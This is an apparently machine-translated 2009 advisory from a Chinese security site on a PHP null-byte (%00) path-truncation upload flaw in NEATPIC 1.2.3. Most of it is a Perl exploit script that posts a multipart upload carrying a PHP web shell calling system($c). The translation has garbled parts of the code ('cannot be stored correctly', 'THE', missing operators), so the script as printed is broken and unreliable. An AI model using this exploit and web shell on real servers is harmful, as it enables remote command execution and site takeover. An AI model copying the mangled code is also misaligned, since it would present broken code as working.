PHP web alerts, a variety of PHP application\0 filter vulnerability-vulnerability warning-the black bar safety net

2009-09-17T00:00:00
ID MYHACK58:62200924680
Type myhack58
Reporter 佚名
Modified 2009-09-17T00:00:00

Description

Vulnerability description:

When the PHP program with the specified PATH, in the PATH of the file Backdoor was added%0 0 can upload any file.

Test procedure: NEATPIC PHP directory direct-reading version 1.2.3

http://web.cncode.com/SoftView.asp?SoftID=1820

This document participants:

Vulnerability experiment: Xiaolu,Lilo,SuperHei,Darkness [All BST Members]

Http://Www.Bugkidz.org

Xiaolu provides a the exploit procedure:

!/ usr/bin/perl

$ = 1;

use Socket;

$host = "127.0.0.1";

$port = "8 0";

$UploadTo = "";

$str =

"-----------------------------7d41f4a600472\r\n".

"Content-Disposition: form-data; name=\"path\"\r\n".

"\r\n".

"./ php. php%0 0\r\n".

"-----------------------------7d41f4a600472\r\n".

"Content-Disposition: form-data; name=\"image\"; filename=

\"F:\\tools\\1.gif\"\r\n".

"Content-Type: text/plain\r\n".

"\r\n".

""system($c);\r\n".

"?& gt;\r\n".

"-----------------------------7d41f4a600472--\r\n".

"\r\n";

print $str;

$len=length($str);

print $len;

$req ="POST /index. php? action=upload HTTP/1.1\r\n".

"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,

application/msword, application/x-shockwave-flash, /\r\n".

"Referer: http://127.0.0.1/index.php?path=.\r\n".

"Accept-Language: zh-cn\r\n".

"Content-Type: multipart/form-data; boundary=----------------

-----------7d41f4a600472\r\n".

"Accept-Encoding: gzip, deflate\r\n".

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT

5.2; Hotbar 4.4.6.0; . NET CLR 1.1.4322)\r\n".

"Host: 127.0.0.1\r\n".

"Content-Length: $len\r\n".

"Connection: Keep-Alive\r\n".

"Cache-Control: no-cache\r\n".

"Cookie: PHPSESSID=1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1\r\n".

"\r\n".

"$str\r\n\r\n";

print $req;

@res = sendraw($req);

print @res;

Hmm...Maybe you can send it by other way

sub sendraw {

my ($req) = @_;

my $target;

$target = cannot be stored correctly($host) die("cannot be stored correctly problems\n");

socket(S,THE,SOCK_STREAM,getprotobyname('tcp') 0) die("Socket problems\n");

if(connect(S,pack "SnA4x8",2,$port,$target)){

select(S);

$ = 1;

print $req;

my @res = ;

select(STDOUT);

close(S);

return @res;

}

else {

die("Can't connect...\n");

}

}